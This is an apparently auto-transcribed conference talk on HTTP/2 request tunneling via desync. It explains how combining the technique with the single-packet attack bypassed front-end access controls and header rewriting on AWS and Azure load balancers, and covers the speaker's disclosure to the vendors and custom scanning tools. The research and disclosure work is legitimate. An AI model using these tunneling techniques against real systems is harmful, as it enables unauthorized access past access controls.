
Right, let's go. So, this is some research I've been working on for the best part of too long, a year in my spare time between things. Uh, and it's all about the single package shuttle digging for desync powered request tunneling. If literally none of that makes sense to you, it'll probably be okay. We're going to go through most of it in as much detail as I'm able to fit in in the 35 40 minutes that we have. Um, and if none of it makes sense, well, follow along until the case studies at the end and hopefully have some fun. Anyway, um, I'm going to be talking about um, a bunch of different things today. We're going to
be talking about the breadcrumbs of research, what request tunneling actually is, specifically in HP2, fixing the existing tunneling detection that exists. There's lots of tool kits out there. We're going to fix a particular one, something that I've coined the 2,000 request problem, which is pretty funny when we come to it. building custom to building custom tooling for your own web security research if you like that kind of thing including building a research pipeline. Then we'll go on to some case studies and it has all the good research should be wrapped up with some other things you could try that I think might work. And there are two core references to this entire kind of presentation and paper um
which is how to be a security or say you want to be a security researcher and building custom research tools both from portrait um they kind of helped me out a lot with how to actually try research for the first time kind of and how to build tools. So both those blogs are worth a read if you're interested. So all good research starts with um some breadcrumbs things that you can follow that will lead to the kind of oh maybe this is something more than this ordinary about the industry there's something new here and for me it started with this if no one recognizes that it's a ping from a tool called HTTP request smuggler that basically says hey I think
you've got a request smuggling vulnerability which is popularized relatively recently and can lead to all kinds of cryp things you should go look into it if you haven't I looked into this ping a bunch on a bunch of different apps and quickly was like nah it's false positive. The way this detection works is basically to cause a delay in the response with a specially crafted HTTP request. Um and it's pretty prone to false positive especially these days. Uh the way you confirm it I had tried to follow the full methodology and it just wasn't working. And then a couple of days later I got another thing and then another couple days later a colleague said to me have you seen this
one before? Can you do anything with it? And then that kept happening and each time I looked into that liquid and got absolutely nowhere and I decided it was 100% false positivity and there's nothing you can do about it. And as far as I'm aware, that's what everyone else has been doing for quite a long time with this specific pain certain servers in testing. However, as is often the case, um, one of my, uh, talented ex-colages, Axel, um, came to me with exactly the same thing, and he'd actually taken it a step further. He'd not the term that wasn't necessarily a false positive, but he had some interesting behavior that you might recognize if you're a big HTTP2 nerd
like me. This request basically shows that if you send a request, a HTTP2 request with both the content length and the transfer encoding header with a really weird body that just says fu and there's two new lines after it, you'll get what looks like a HTTP2 response with a HTTP1 response in the response object, which to me made absolutely no sense. But this is actually a very strong indication of something called HTTP request tunneling, which we'll cover now. And you can see, oh, I did super weird. If you ever see HP2 with a HP1 response in the body, you've definitely done something weird and they are definitely doing some funky things. So, let's go through what HTTP request
tunneling actually looks like. Let's start with desync attacks. Desync attacks were popularized over and over and over again by various people at this point, but they all rely on the same thing. I want you to imagine that you have a front-end server and a backend server. Um, in this case we're just using HTTP 1.1 because there are two different ways to represent message length in HTTP. You can have the content length which is on the left hand side and the transfer encoding uh header which is going to be on the right hand side. If you use the content length, this request says that all of that stuff that's still highlighted is in the body. So from the three all the way down to
the example.com host and two. That's pretty simple, right? It's just 50 bytes of data in the request. However, if the front end uses the content length and the back end uses the transfer encoding header, which is completely RFC compliant, you should prioritize the transfer coding header. The front end is the naughty one in this case. Um, the back end thinks that the entire body is just the x equals y. That zero and two new lines basically represents the ends of the body in h1 for a transfer encoded um chunked by chunk request. meaning that this extra data at the end of fall to the back end is a completely separate request. Okay, so the front end thinks
this is all one big request and the back end thinks that this is two requests. And this kind of uh disorganization between how different servers interpret message lengths in HT1 um causes request smuggling and as we'll now find out request tunneling. Request modeling is much much much more known about. Um and the main difference with request tunneling is that rather than sharing a single connection between the front end and the backend application, every client gets their own connection between the front end and the back end. If you don't already know what front-end servers often do is create what are called keep alive connections to backend servers and rather than continually opening new TCP connections which is
really slow and resource not resource intensive but it's just slower just keep that connection alive. heads keep alive and you send data back and forth on this kind of tunnel between the front end and the back end. In HTTP request smuggling, you just have one line between the front end and the back end or some pool of connections that all users share. And that's really dangerous because when you leave prefixes like we saw in the previous slide, extra data on those tunnels on those connections, sorry, uh you can basically influence other people's requests. With request tunneling, however, the architecture is that each client, even if you share the same public IP address, even if you're
both on the network A, network B, you have your own connection to the front end of the back end. So your requests never go anywhere near any other users's requests, which sounds super secure. And actually, lots of popular frontend servers dynamically switch to this behavior when they detect people trying to do request smuggling, thinking that it will save them. Unfortunately, it doesn't. Request tunnling. um is a vulnerability that you can use to exploit this architecture in particular most easily in cases where you have a HTTP2 server that downgrades to HTTP1 and you might be thinking well no one does that actually most of the web does that um all the popular front end servers basically support HTTP2 and a lot of the
back end servers are starting to uh implement HTTP2 but for backward compatibility reasons usually run by default in HTTP1 so your client and the front end is speaking HTTP2 and your back end is going to be speaking HTTP1. [Music] So what actually happens is if you're trying to exploit request tunneling is as a client you send a request that looks like this. This is a HTTP2 request. So the content length and transfer encoding headers are completely irrelevant. HTTP2 has a built-in length me length mechanism. It basically a little uh bit in the in the in the frame. I think it just which just says how big the frame is. So these headers are meaningless in HTM. You could
probably just ignore them, but they're kind of kept in for fun. And then you add a zero, which represents the end of a request. It doesn't in HTTP2, but we're just pretending it does. And then you have a full request in the body, which is this in this case a get. So for full page, the client sends that to the front end. The front end uses HTTP2 and says, "Yeah, that's one full request. No problem." It then flips the language into HTTP1. It changes it from a binary to a plain text protocol. It gets details of which you don't really need to know. Um, and then fors it on to the back end as is. Um, yeah, you can see
the front end is basically sending all the body data. It's not leaving anything behind. It knows that that data is all part of the body of the initial request. Now, once it gets to the back end, things get tricky. Now, we're talking HTTP1. So, these headers suddenly have a lot of meaning. And let's say for argument sake that the back end chooses to use the transfer encoding header. It knows it's a post request, so it needs to look at the body and it reads in the data says, "Oh, there's a chunk encoding call. I'll read up to here. That's the end of the request." It says zero. This the end of the request in terms of
encoding and therefore thinks that this is the start of the next request. So if the back end has two requests, what do you think it does? It responds twice. Why wouldn't it? It's got two requests. They're two separate bits of data. So it responds twice and streams that data back to the front end. The front end having issued one request to the back end expects one response from the back end. Seems fairly standard. So basically it takes what thinks is it thinks just like a big stream of data. It doesn't know that there are two responses here. It just receives a bunch of bes and goes okay and stitches together. And suddenly you have a HTTP2 request with a HTTP1
request uh sorry response in the body of the response and that gets sent back to the client. You have now successfully tunnneled a request the front end that the back end actually interprets but the front end completely ignores. That doesn't sound particularly dangerous until you start to think about the fact that access control rules can be put in place on the front end which now no longer apply because the request is hidden in the body. Access control rules tend to apply to the request itself the headers and not the body of the request because so now we know what request tunneling actually is. There's a really really great tool for detecting it um called hate to be requested to smuggle up. This
has been invented by Paul Swig. It's really really good and it is where I found these kind of strange pings that I thought initially for months sadly with false positives. It actually has built-in detection for request tling and because I'm just that lazy and I don't want to manually check the request tingling every time I test. I thought well what's actually wrong with the detection they have? This is the detection method they're using. It looks very similar to the request I sent that had fu except it has bar and r at the end of it. I guess representing like the method path and HTTP version. So a kind of vaguely invalid HTT request. But in
the case I was working with this never ever responded with HTTP response and therefore the detection just failed. So I kind of ripped my teeth and decided I'd take a look at the Java code that was used to write this tool. And it's very simple as it turns out. There's a a scanner file called headscan te probably headscan transfer encoding. And on the left you can see that there's a a string called food bar which looks like the payload you're supposed to send and then just add it to this list or array called attacks maybe. I don't know much about that seems about right. So I just added two new lines to this tool which were uh
an attack called fu which is just foo and two new lines and then added that to the list of um attack methods. And then I ran this uh new detection method against all the apps that I found that I thought false positives and it worked 100%. I thought hey that's a really easy new little novel security technique for detecting things. Not bad. Not quite uh not amazing, but you know, it's new. It works. That should be in the press mug very soon. Um and it worked against all those cases that I thought were false positives. So now that detection was working, I figured, hey, let's exploit all these new vulnerabilities that I found in our
customers environments. However, I quickly ran into a problem that I've called the 2000 request problem. Um, when doing smuggling or tunneling even, you'll often find that when you're doing the detection, you instantly get back a tunnel's hybr response, and it's really, really quick, really, really fast, which is great. But the second you try and actually do an exploit, so you're going to smuggle or tunnel an entire request to the back end. So, the first one is just kind of like part of a request. It's very invalid. The second one is a whole request. It basically would take like 2,000 requests for you to get one single hit back. And that takes a lot of effort.
You got to send that request on the left on the left over and over and over and over again just to get one valid response back which is really really tedious. Um and I got stuck on this for months with all these cases. So I thought to myself, what the hell is causing this inconsistency? It makes absolutely no sense. And I kind of forgot about it for a while. And then on a train looking out the window when it was raining and head down to Plymouth, literally to see my parents just down the road, I decided I'd have a think about it out loud, which I must have looked absolutely mental, but I was just saying these
phrases to myself in my head. It takes thousands of requests to get one successful hit. That's kind of weird behavior in itself. Thousands, you know, tens or hundreds maybe for modeling at first. Completely impractical. It's a lot of data to be sent. It's also so it's inconsistent, but it's inconsistently inconsistent. Sometimes it would take 2,000 requests and sometimes it would take two. It would just suddenly work. And I had no idea what the hell that meant. Now, the astute among you may know what this kind of behavior describes. Something that's really, really inconsistent, inconsistently inconsistent, very hard to recreate. Um, and I kind of thought to myself, wow, that's kind of maybe a race condition, but it can't possibly be a
race condition. It doesn't make any sense. It was a race condition. Fortunately for me, web race conditions just got made incredibly practical that year at Defcon and Blackat with something called the single packet attack. Hence, the single packet shut. So for those of you who don't know, the single packet attack basically fixes web racing conditions. For a race condition to occur, these two requests have to hit the race window at basically the same. Well, sub millisecond, but we'll say millisecond for 100. And all these things get in the way. Network latency, jitter, internal latency, dumb, bit flips, whatever. You know who you pray to, for example. The single packet attack fixes this by basically bundling
I don't know 20 or 30 requests together um sending most of the data and withholding um just the last bite of data and then it sends that last bite all in one single packet and the application server is very unlikely to actually start processing that data until it receives the full request. So when you turn them in the single packet attack, you remove network latency and just it almost entirely internal latency is likely to be significantly more consistent and your race condition windows line up significantly more often which is very very useful for trying to exploit race conditions. So my solution to this seems obvious. Let's see if I can use the single packet tank to make
my new method detection and exploitation of request tingling super super consistent. So that's what I went about doing. Unfortunately, not only is a single packet attack relatively simple to kind of understand for just syncing up the timings of the quest server in some technical way, it's also extremely trivial to actually implement and use. In verse, you can basically add a bunch of requests to a repeater uh group. So you have like five requests to repeater, put them in a group, and then select send group in parallel. So this is what I tested. I took this exploit request which is there's just two here but you can imagine having up to 30 of them with the uh attempt to tunnel a request in
the body of the H2 request and sent them as a single packet and instantly I got a successful hit back. This actually worked still blows my mind today. Um so some kind of strange combination between race conditions and request tunneling exists. Um and I haven't read anything about it. So I think it's pretty cool new as a result of this. I think this worked kind of so much so consistent that it was kind of 80% consistent. You only have to try this kind of a few times in a row for it to get hit, which is a lot better than sending 2,000 requests. Now you're sending kind of well one packet in theory, but 30
requests down a funny. Now this made exploitation significantly easier. But my brain as a tester, as a lazy person, as a researcher thought, hey, if this works for exploitation, maybe it also works for detection. I already improved the detection. Maybe I can improve it further by just sending everything in the same packet attack. So, let's build a custom research tool because that doesn't exist at the moment. Fortunately, um, as the latest tester I am, I'm also a lazy programmer and I don't want to go about building tools that can scan lots and lots of targets. So, I went and found one. If you haven't heard of Bolt Scan, it's in basically all of BS research tools. um is on GitHub of
course and it basically allows you to bulk scan things. Uh it allows you to select kind of your entire B proxy history regardless of size. Well okay there are some soft limited to memory consumption something like 100,000 requests but in theory you can just select as much data as your brand will handle. Um it will then dduplicate similar requests and responses based on keys. So like if the server header looks exactly the same uh and the request path is exactly the same and the request parameters are exactly the same but we don't need to scan those two requests you can just scan one. So it will do duplicate dduplicate that for you. Each scan runs in its own thread so you
haven't got to do any of the magic that people do with threading tools and the thread count is completely customizable because you have a nice powerful laptop and that's all you need. You don't need like a huge research machine. you can just whack that thread count way up. And you can also combine it with a tool called distribute damage which allows you to reply a per host rate which is really important when you're going to scan the internet otherwise people get angry at you because you're sending lots and lots of requests per second. Instead you can send like 200 requests per second to 200 hosts and then you wait 5 seconds and do it again. So you also
bypass frame limits which is really happy to actually implement a scan into bulk scan is also fairly trivial. My idea was to take all the existing permutations from HTTP request modeling. If you don't know what those look like, they're kind of weird nonRSC compliant versions of the content l transfer coding header. So you have spaces in weird places, backslashes, they should be rejected, but HTTP service love to be helpful and just accept them anyway. Uh, and there are lots of different ones out there. So to actually code this, the only code I actually wrote um is basically a little class that says override the do scan method from bolt scan and then for all the permutations
I've written um create a request or take the request from the proxy that you're scanning in this particular thread. Apply the permutation which just means replace the transfer encoding and all the content link header with the permuted header. um then attempt to send that new exploit request in a single packet and then go through all the responses from the single packet attack and if any of them contain any response reporting issue invert that's literally it I also because I struggle with Java um took bulb scan imported it into kind of a template uh and wrote it rewrote it cotlin which is basically a very pythonic version of Java in a sense which means that if you
go to my GitHub you can build research tools that you basically you just get dropped into this class and you can just interact with the verb multi API uh which is really really really easy. This code isn't far off the actual code I wrote genuinely. So from there I had a research tool that I kind of thought would be interesting to run against lots and lots of targets. Of course now I needed lots and lots of targets and you can't just go scanning the internet in general you can but this is very malicious. It could trigger things that wouldn't trigger. So what can I illegally target? Well, bug bounty seemed like a good start. Um, this is a
common technique. You take a tool like bug bounty scope, which will just take all the scopes like hacker one crowds in integrity, integrity, however it's called, a couple of other big ones. Um, and dump them into an Excel file. And if you're being kind like I was, you go through the hundreds and hundreds of entries manually and check if they allow automated scanning. Lots of them don't. Um, yeah, that took a long time. Uh once you have uh a list of scopes that you're actually going to be allowed to scan, you can then take some DNS data. I think Project Solar has a database of every known host name ever. Um but I don't have access to that. I'm not really sure
how. I think you just have to email them and say very nicely, I'm doing a recent project. But obviously what I wrote wasn't very good. I don't know. Uh but there is an open source one from project discovery or people to DNS databases all the data. So I can take kind of five million domains from this huge amount of DNS data, map it against my scopes, check how many of them are actually alive and running HTTP HTTP, sorry, which is about 150,000 uh alive domains I'm legally allowed to attempt hacking and automation against and then pump them into one massive sweet file that I can run my tool against. And then you select everything in proxy and hit scan.
can you pray? And I got some hits and then I got some more hits and I was like, this works and it really did. I'm making good time. This is good. Um, I got a ton of cases. So many that by the time I had reported to the two key vendors involved here, which is as early as I could uh in the process, um, I ran out of time testing them to try and find interesting things. request tunneling is really tricky to exploit, but I've got some examples for you to try and hammer home the idea that this really can lead to some um some very bad things. Uh and the tooling for this, I'll come back to that in a sec.
Um so we have a research file. We have a ton of cases on legally actable targets. We have some novel techniques um using a single packet attack to trigger request tunneling. What can we do? Who was actually impacted? Although like I said there were two key vendors um that would be in front of or showing the same kind of back end and fortunately for me they were quite interesting customers. The first was Amazon web services. Um Amazon's application load balancer does downgrading by default and when attacked with a single packet flips into some like oh I'm receiving a lot of requests mode so I'll chunk all the data I'm receiving. It still does this after
the fix and I don't really know why. I have asked and they never really respond from that part of my email. So regardless, um, this example is from a a real bubic site that I actually managed to exploit. They didn't really care much, but I think it's a great example. I want you to imagine that we're sending a get request to the admin pallet, which obviously I'm not supposed to get access to. And I can see that the AWS load balancer was getting in the way and saying, "No, you're going to admin. I'm going to redirect you away and say error bad at done. Don't don't go that way. And that's totally fine. But of course
with request tunneling since the rule applies to the encapsulating request so to speak, I'm not sending a request to admin. I'm sending a request to the homepage and I'm tunneling a request to the admin panel. And when you do this, Amazon's application load balancer will look at the request go okay no request to admin. That's fine. pull the data, all the kind of stuff that we just talked about with request uh request tunneling and the single packet attack happens and you get a response with 404 with this 402 and then the admin panel in the body of the request. Now, of course, you can't render it. You just have to kind of interact with it over
and over again and you can do all kinds of dangerous things because you're just completely bypassing the access controls they've put in place in the front end which is good fun. Additionally, this isn't the only kind of um access control that you can put in place um on a front end. This is the most common one. You just set a path that you don't want people to reach and you assume that the front end is enough to protect against the rest just totally bypasses those rules. Front ends also rewrite headers for you. So, this one's a little more complicated. I want you to imagine that this pseudo code is running on the back end and it says for the root
for me. Um the root admin has a function that says when a request arrives if the exorded for header is set to localized which just means the machine that the server is physically on someone locally sat there so probably someone with a high privileges access then return the template that's actually the page otherwise if it's any other value just respond with a for so it's a kind of access control that you can have in place that just says if someone is visiting the app server give them access to the admin panel Otherwise, if you're coming from any other IP address, um you can't access it. By the way, that's probably an important point. The exhorting for header is added by uh
front ends to say this is the public IP of the request, the originating request. So, I request something, it will say my public IP. So, you can do more things like tracking people. So when you send a request like this um from the client, the front end basically adds the exported for header with my public IP address. This isn't really uh this is a random book. Uh and then the back end receives that runs the code and returns a four header since the exorder for header header added by the front end uh does not equal to localized. Okay, it seems like a pretty secure pattern for the most part. The exported for header represents the public copy. Um, and the
back end just touches it and says, "Yeah, you're not coming from the soft. I'm going to reject the request." If you're a pentester or just maybe slightly creatively minded, you're thinking, well, I can't I just have my own exported full header as a client and you can. So, if I send a request like this as a client and say, "Hey, I'm I'm coming from local host. Trust me, it's fine." Uh, the front end will go, "No, you're not." And it will rewrite the header. Okay? And it does this by searching through the headers in HTTP2 and saying no I'm going to read back that header. I don't care what value you give it. Now of course while the header
gets rewritten in the headers there's a place where it doesn't get rewritten. So with request tunneling what I can do is send a request like this and I have the exported for and local host um value set there. the front end goes, "Hey, I'm going to add my excellent for header to your headers and then pass on the back end." This one gets left completely untouched. So, it reaches the back end and then you also access the app. So, both of those patterns um basically bypass access controls. Now, you might be thinking, how do you know that an application is even using the exported header? How do you kind of get that information? Well, you can just read
documentation for one part. They'll often front ends apps state the headers they add HTTP scheme exported for or exported host exported ports maybe exported protocol whether you're using HTTP HTS all that kind of stuff but also um you can use a tool called brand miner to just guess um headers and actually brand miner has an integration where it works with request tunneling so it will guess headers in the tunnled request and see if the tunnel response makes any differences so you can quickly figure out uh if any headers and it's kind of interesting and then you can magically see plus interesting stuff. Of course, um that doesn't work when you have to use a single packet to attack it. So I
took a really rubbish version of that code and tried to stuff it into my like a binary search to my uh tool which is all public. So if you come across this you can definitely use it. Um I did manage to get a real case using that but the the tooling absolutely works. I know I know for sure in so other than AWS, what was the other vendor? Oh, sorry, let's not move on too quickly. AWS fix AWS were awesome. Um, there's no bounty program for the cloud services. There is one, but it's a disclosure. Obviously, it's not a which is fine. I reported it to them. They basically immediately communicated out some mitigations which is to accept I
think BDC protection too strict and it would basically be more strict with the way it passed these vulnerabilities all these requests there deployed some updated documentation the new user mitigation classification which is cool it's not credited to me but it's my fault so I'm happy about and then uh in March of this year they deployed a fix and if you're wondering the redacted um thing in the program was discussed that they happily were able to let me unreact And that's yet the fix is pretty simple. If you send a request to any application load balancer from AWS now that has a transfer encoding header with a space before the colon, you just immediately receive a for request. It just drops.
So far as I know that fix is working to do it since. So good job. They were very nice about it. Since it works on AWS, I figured let's see what else it works on as I'm scanning. And a few of my cases um were from the other one Azure front door. Um I still don't know why this worked. They actually weren't vulnerable. I could tell it was Azure because they had X ref which is a known header from Azure. And I had a case where um my normal single packet detection worked. It actually didn't even require the single packet for this one which is kind of interesting. But also it was only one server that
actually responded this way. which is kind of interesting. The rest of them were just vulnerable to kind of regular request smuggling which is quite similar. It was connection locked so you couldn't affect other users. So it's effectively very similar to tunneling. You can only bypass kind of front ended rules and you can leaky tunnel headers and do other fun things. I've not given an example because it's basically the same as what you just saw. Um but effectively you send a request that looks a bit like this. Rather than smuggling an entire request, you're just smuggling a prefix. Um and then you'll receive a bunch of 200s and 404. And that 404 could be for example the app
whatever rule you want it to. You again have full control of the request that you're sending and avoid any rewrites which is also very good. Um I reported this to MSRC and they responded with this big letter which kind of boils down to thanks very much. Um not urgent request smuggling isn't a vulnerability on its own. Um which is maybe fair f fairly. you need the kind of gadget you need the back end to implement some code that is vulnerable that you can use or the front end to have a rule in place. So I asked for some clarification what kind of impact they'd like that would that would prove it and I I gave them examples uh and
they just never responded. So this is my public disclosure. It isn't fixed as of last week when I last checked it. Um so if you want to go hunting for this feel free it works with normal detection techniques. Um, if you want some examples, I have my research file here. Um, I can show you. Um, if it's still working, you never know. They might have fixed it, but that's just what happens sometimes. So, let's wrap it up as quickly as I can. Some key takeaways. Request tunneling is still underrated. It was underrated before. It's still underrated now. Cases of it are hiding away. It's often blind. You get no kind of response back or it's just really,
really tricky to exploit because of the 2,000 request problem. But there are ways to get around that. Um, the single packet attack seems to work well. While it worked really well in AWS, it may still work in other places. Um, I haven't found any, but the research tool exists on my GitHub if you wish to use it. And also, all the tooling that I built exists on my GitHub. It might be private right now, but I'll make it public right after this. Um, building your own research tools for B is really not that scary. I thought it would be terrifying. I'm not a programmer, but thanks to B scan, you just kind of write just the scan check and then highlight
everything you can say. If you're interested in doing your own research, um the two articles I linked at the beginning would really be great. But also my biggest bit that seem to work for me is when you follow the breadcrumbs actually be the ones to go back and say maybe that false positive is worth looking into more and then keep pulling the thread. And if you do, you'll end up building tons of wacky tools that work and find you cool cases in cloud services. Like I said, tooling and resources available at my GitHub. And finally, as researched, let's wrap up with some further research ideas. It's browser powered request tunneling. Launching request tunneling from your
browser with completely HTTP2 compliant request. Not just a theory that actually works. I haven't published uh my web so far because uh I really want to get working exploit for it, but the detection for it is working. And there are certain servers that just ignore content lengths allow for best tunneling. It's very fun. They're definitely worth looking into. If you can think about how to build a technique to detect it, uh it's really easy. you just go scanning the single packet applied against other HP2 downgrading to HP1 implementations like AWS Azure Google Cloud Platform might be a good other target. Um further method to make request tunneling not blind James Kettle's head technique is great. Um for
some reason this technique of just slightly shortening the request and making it through also kind of made request handling unwind which was super useful. I'm not sure if we have time for any questions, but thank you very much for listening. Check out our blog and check out my blog and follow me on Twitter and all this guy. Thank you very much.
>> Any questions? Yeah. Put this against Um I hope not. I I have no idea actually if the routine would be like getting in the way completely. I guess the packages just gets passed through all the different layers and then depending on where it ends up like a first interpretation of it and the last interpretation of it be what be what mattered. >> Um so maybe Good, good question. Not not 100% sure. You'd have to go to talk and find that. Let me know.
>> One more. Sorry. >> With obviously being front end, would you argue that given if it well most apps nowadays are secure by design, anything that can pose much of a vulnerability would be verified on the back end a separate way. not >> you would certainly hope so. >> Yeah. >> Yeah. Yeah. Yeah. That's an assumption but um I have learned to not make such assumptions. Um >> yeah the example I gave the very first AWS example is a case of that as a real website on the internet that just trusted the front end and especially the header exploit. A lot of servers implicitly trust front end header rewrites. Um not necessarily for authentication but for other critical
things. There are some really really bad examples published by James Her like owns the entire internal network somehow using the host header being written. So yes, I assume people do add extra on the back end but they don't in theory 100%. >> I also assume that sorry >> they also assume >> they also assume that the front end is pretty solid because it's from Amazon. Yeah. Cool. One more. Go ahead. Um, are there any options for like back end that run the HTTP2? >> Yeah. Yeah. Yeah. >> With all the things. >> It's not um it's not Yeah, I've always downgrading that. Oh, the fix this is probably a good thing to mention because use HP2 end to end 100% of the time. Um,
it's becoming a lot more common cuz I understand it and uh I've heard some comments about CDN's being the blocker for it a bit. Um, so yes, lots of back ends do now support and they should use it by default and so should all you. It's cool. Thanks very much.